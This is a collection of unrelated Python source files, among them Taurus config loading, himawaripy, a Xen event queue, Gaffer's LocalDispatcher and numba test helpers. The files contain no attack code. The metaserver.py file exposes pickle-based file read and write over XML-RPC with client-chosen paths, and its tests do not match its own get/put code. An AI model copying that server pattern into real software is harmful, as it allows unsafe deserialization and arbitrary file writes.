if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
|
search.py
|
from flask import request
from flask import jsonify
from flask_cors import cross_origin
import threading
from .sem_search import SemSearch
def load_in_background(nlp, app, stops_path):
ss = SemSearch(stops_path)
app.logger.info("🔋 sem_search ready")
nlp.set('search', ss)
def add_search(app, nlp, stops_path):
thread = threading.Thread(
target=load_in_background, args=(nlp, app, stops_path))
# thread.start()
nlp.queue('search', thread)
@app.route('/api/search', methods=['GET'])
@cross_origin()
def search(): # pylint: disable=unused-variable
ss = nlp.get('search', check_ready=True)
# maybe add a default to get (risky because of no exclude sources)
query = request.args.get('q', default="")
results = ss.predict_slugs(query) # return a vector directly
return jsonify(results)
|
thread_example_with_io.py
|
# -*- coding: utf-8 -*-
'''
j.philipson
9:32 PM, 1/27/2021
'''
import threading
#ref: https://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
def addMyNumbers(a,b):
return a+b
x = threading.Thread(target=addMyNumbers, args=(1,2))
x.start()
x.join()
print(x)
print('done and sunny')
|
event_queue.py
|
import copy
import queue
from collections import OrderedDict
from threading import Thread
from connman import ReDBConnection
from loggable import Loggable
from tornado.options import options as opts
from xenadapter import XenAdapterPool
from xenadapter.event_dispatcher import EVENT_DISPATCHER
import json
from datetimeencoder import DateTimeEncoder
def print_event(event):
ordered = OrderedDict(event)
ordered.move_to_end("operation", last=False)
ordered.move_to_end("class", last=False)
return ordered
class EventQueue(queue.Queue, Loggable):
def __init__(self, authenticator, db, num_workers=16):
super().__init__()
super().init_log()
self.db = db
self.authenticator= authenticator
self.log.debug(f"Processing Xen events using {num_workers} workers")
self.log.debug(f"Event dispatcher configuration: {EVENT_DISPATCHER}")
for i in range(num_workers):
t = Thread(target=self.process_events, args=[copy.copy(self.authenticator)])
t.daemon = True
t.start()
def __repr__(self):
return 'EventQueue'
def process_events(self, authenticator):
with ReDBConnection().get_connection():
authenticator.xen = XenAdapterPool().get()
while True:
event = self.get()
if event['class'] == 'message':
self.task_done()
continue # temporary hardcode to fasten event handling
log_this = opts.log_events and event['class'] in opts.log_events.split(',') \
or not opts.log_events
if not event['class'] in EVENT_DISPATCHER:
if log_this:
self.log.debug(
f"Ignored Event: {json.dumps(print_event(event), cls=DateTimeEncoder)}")
self.task_done()
continue
if log_this:
self.log.debug(f"Event: {json.dumps(print_event(event), cls=DateTimeEncoder)}")
for ev_class in EVENT_DISPATCHER[event['class']]:
try:
ev_class.process_event(authenticator, event, self.db, self.authenticator.__name__)
except Exception as e:
self.log.error(f"Failed to process event by {ev_class.__name__}: {e}")
self.task_done()
|
__main__.py
|
#!/usr/bin/env python3
import argparse
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import subprocess
import sys
import threading
import time
import urllib.request
from datetime import timedelta, datetime
from glob import iglob, glob
from time import strptime, strftime, mktime
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.interval import IntervalTrigger
from apscheduler.triggers.cron import CronTrigger
import appdirs
from PIL import Image
from dateutil.tz import tzlocal
from utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 0, 1)
counter = None
HEIGHT = 550
WIDTH = 550
LATEST_JSON = ''
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
print("Offset is greater than +10, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
print('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
os._exit(3)
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
default_output_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wallpaper')
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=default_output_dir)
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def thread_main(args):
global counter
global LATEST_JSON
counter = mp.Value("i", 0)
level = args.level # since we are going to use it a lot of times
print("Updating...")
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
if latest_json == LATEST_JSON:
print('Skip...')
return
LATEST_JSON = latest_json
requested_time = calculate_time_offset(latest, args.auto_offset, args.offset)
if args.auto_offset or args.offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (args.level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
for file in iglob(path.join(args.output_dir, "himawari-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("himawari-%Y%m%dT%H%M%S.png", requested_time))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if sys.platform == 'win32':
return
if not set_background(output_file):
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
def run():
scheduler = BlockingScheduler()
scheduler.add_job(main, trigger=IntervalTrigger(minutes=1), next_run_time=datetime.now())
try:
scheduler.start()
except KeyboardInterrupt:
sys.exit('Quit!\n')
if __name__ == "__main__":
run()
|
metaserver.py
|
#!/usr/bin/env python
import sys, SimpleXMLRPCServer, getopt, pickle, time, threading, xmlrpclib, unittest
from datetime import datetime, timedelta
from xmlrpclib import Binary
# Presents a HT interface
class SimpleHT:
def __init__(self):
self.data = {}
def count(self):
return len(self.data)
# Retrieve something from the HT
def get(self, key):
# return value
if key not in self.data:
return -1
return self.data[key]
# Insert something into the HT
def put(self, key, value):
# Remove expired entries
self.data[key] = value
return True
# Load contents from a file
def read_file(self, filename):
f = open(filename.data, "rb")
self.data = pickle.load(f)
f.close()
return True
# Write contents to a file
def write_file(self, filename):
f = open(filename.data, "wb")
pickle.dump(self.data, f)
f.close()
return True
# Print the contents of the hashtable
def print_content(self):
print self.data
return True
def pop_entry(self,key):
return self.data.pop(key)
def get_keys(self):
return self.data.keys()
def main():
optlist, args = getopt.getopt(sys.argv[1:], "", ["port=", "test"])
ol={}
for k,v in optlist:
ol[k] = v
port = 51234
if "--port" in ol:
port = int(ol["--port"])
if "--test" in ol:
sys.argv.remove("--test")
unittest.main()
return
serve(port)
# Start the xmlrpc server
def serve(port):
file_server = SimpleXMLRPCServer.SimpleXMLRPCServer(("localhost", port))
file_server.register_introspection_functions()
sht = SimpleHT()
file_server.register_function(sht.get)
file_server.register_function(sht.put)
file_server.register_function(sht.print_content)
file_server.register_function(sht.read_file)
file_server.register_function(sht.write_file)
file_server.register_function(sht.pop_entry)
file_server.register_function(sht.get_keys)
file_server.serve_forever()
# Execute the xmlrpc in a thread ... needed for testing
class serve_thread:
def __call__(self, port):
serve(port)
# Wrapper functions so the tests don't need to be concerned about Binary blobs
class Helper:
def __init__(self, caller):
self.caller = caller
def put(self, key, val, ttl):
return self.caller.put(Binary(key), Binary(val), ttl)
def get(self, key):
return self.caller.get(Binary(key))
def write_file(self, filename):
return self.caller.write_file(Binary(filename))
def read_file(self, filename):
return self.caller.read_file(Binary(filename))
class SimpleHTTest(unittest.TestCase):
def test_direct(self):
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
helper.write_file("test")
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
helper.read_file("test")
self.assertEqual(helper.get("test")["value"], "test2", "Load unsuccessful!")
self.assertTrue(helper.put("some_other_key", "some_value", 10000))
self.assertEqual(helper.get("some_other_key")["value"], "some_value", "Different keys")
self.assertEqual(helper.get("test")["value"], "test2", "Verify contents")
# Test via RPC
def test_xmlrpc(self):
output_thread = threading.Thread(target=serve_thread(), args=(51234, ))
output_thread.setDaemon(True)
output_thread.start()
time.sleep(1)
helper = Helper(xmlrpclib.Server("http://127.0.0.1:51234"))
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
if __name__ == "__main__":
main()
|
LocalDispatcher.py
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import errno
import subprocess
import threading
import Gaffer
import IECore
class LocalDispatcher( Gaffer.Dispatcher ) :
def __init__( self, name = "LocalDispatcher" ) :
Gaffer.Dispatcher.__init__( self, name )
backgroundPlug = Gaffer.BoolPlug( "executeInBackground", defaultValue = False )
self.addChild( backgroundPlug )
def jobDirectory( self, context ) :
jobDirectory = Gaffer.Dispatcher.jobDirectory( self, context )
result = os.path.join( jobDirectory, "%06d" % self.__nextJobId( jobDirectory ) )
while True :
try :
os.makedirs( result )
break
except OSError, e :
if e.errno == errno.EEXIST :
result = os.path.join( jobDirectory, "%06d" % self.__nextJobId( jobDirectory ) )
continue
else :
raise e
return result
def _doDispatch( self, batch ) :
script = batch.requirements()[0].node().scriptNode()
context = Gaffer.Context.current()
scriptFileName = script["fileName"].getValue()
jobName = context.substitute( self["jobName"].getValue() )
jobDirectory = self.jobDirectory( context )
messageTitle = "%s : Job %s %s" % ( self.getName(), jobName, os.path.basename( jobDirectory ) )
tmpScript = os.path.join( jobDirectory, os.path.basename( scriptFileName ) if scriptFileName else "untitled.gfr" )
script.serialiseToFile( tmpScript )
if self["executeInBackground"].getValue() :
self.__preBackgroundDispatch( batch, messageTitle )
threading.Thread( target = IECore.curry( self.__backgroundDispatch, batch, tmpScript, messageTitle ) ).start()
else :
self.__foregroundDispatch( batch, messageTitle )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, "Dispatched all tasks." )
def __foregroundDispatch( self, batch, messageTitle ) :
for currentBatch in batch.requirements() :
self.__foregroundDispatch( currentBatch, messageTitle )
if not batch.node() or batch.blindData().get( "dispatched" ) :
return
script = batch.node().scriptNode()
description = "executing %s on %s" % ( batch.node().relativeName( script ), str(batch.frames()) )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, description )
batch.execute()
batch.blindData()["dispatched"] = IECore.BoolData( True )
def __preBackgroundDispatch( self, batch, messageTitle ) :
if batch.node() and batch.node()["dispatcher"]["local"]["executeInForeground"].getValue() :
self.__foregroundDispatch( batch, messageTitle )
else :
for currentBatch in batch.requirements() :
self.__preBackgroundDispatch( currentBatch, messageTitle )
def __backgroundDispatch( self, batch, scriptFile, messageTitle ) :
if batch.blindData().get( "dispatched" ) :
return
for currentBatch in batch.requirements() :
self.__backgroundDispatch( currentBatch, scriptFile, messageTitle )
if not batch.node() :
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, "Dispatched all tasks." )
return
script = batch.node().scriptNode()
taskContext = batch.context()
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
cmd = [
"gaffer", "execute",
"-script", scriptFile,
"-nodes", batch.node().relativeName( script ),
"-frames", frames,
]
contextArgs = []
for entry in taskContext.keys() :
if entry != "frame" and ( entry not in script.context().keys() or taskContext[entry] != script.context()[entry] ) :
contextArgs.extend( [ "-" + entry, repr(taskContext[entry]) ] )
if contextArgs :
cmd.extend( [ "-context" ] + contextArgs )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, " ".join( cmd ) )
result = subprocess.call( cmd )
if result :
IECore.msg( IECore.MessageHandler.Level.Error, messageTitle, "Failed to execute " + batch.node().getName() + " on frames " + frames )
batch.blindData()["dispatched"] = IECore.BoolData( True )
def _doSetupPlugs( self, parentPlug ) :
if "local" not in parentPlug :
localPlug = Gaffer.CompoundPlug( "local" )
parentPlug.addChild( localPlug )
parentPlug["local"].clearChildren()
foregroundPlug = Gaffer.BoolPlug( "executeInForeground", defaultValue = False )
parentPlug["local"].addChild( foregroundPlug )
def __nextJobId( self, directory ) :
previousJobs = IECore.ls( directory, minSequenceSize = 1 )
nextJob = max( previousJobs[0].frameList.asList() ) + 1 if previousJobs else 0
return nextJob
IECore.registerRunTimeTyped( LocalDispatcher, typeName = "Gaffer::LocalDispatcher" )
Gaffer.Dispatcher.registerDispatcher( "Local", LocalDispatcher() )
|
support.py
|
"""
Assorted utilities for use in tests.
"""
import cmath
import contextlib
import enum
import errno
import gc
import math
import platform
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import warnings
from contextlib import contextmanager
import numpy as np
from numba import testing
from numba.core import errors, typing, utils, config, cpu
from numba.core.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
import unittest
from numba.core.runtime import rtsys
from numba.np import numpy_support
try:
import scipy
except ImportError:
scipy = None
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_32bit = sys.maxsize <= 2 ** 32
is_parfors_unsupported = _32bit
skip_parfors_unsupported = unittest.skipIf(
is_parfors_unsupported,
'parfors not supported',
)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
utils.PYVERSION < (3, 7),
"try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
utils.PYVERSION >= (3, 7),
"try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
_lnx_reason = 'linux only test'
linux_only = unittest.skipIf(not sys.platform.startswith('linux'), _lnx_reason)
_is_armv7l = platform.machine() == 'armv7l'
disabled_test = unittest.skipIf(True, 'Test disabled')
# See issue #4026, PPC64LE LLVM bug
skip_ppc64le_issue4026 = unittest.skipIf(platform.machine() == 'ppc64le',
("Hits: 'LLVM Invalid PPC CTR Loop! "
"UNREACHABLE executed' bug"))
try:
import scipy.linalg.cython_lapack
has_lapack = True
except ImportError:
has_lapack = False
needs_lapack = unittest.skipUnless(has_lapack,
"LAPACK needs SciPy 1.0+")
try:
import scipy.linalg.cython_blas
has_blas = True
except ImportError:
has_blas = False
needs_blas = unittest.skipUnless(has_blas, "BLAS needs SciPy 1.0+")
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.core.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
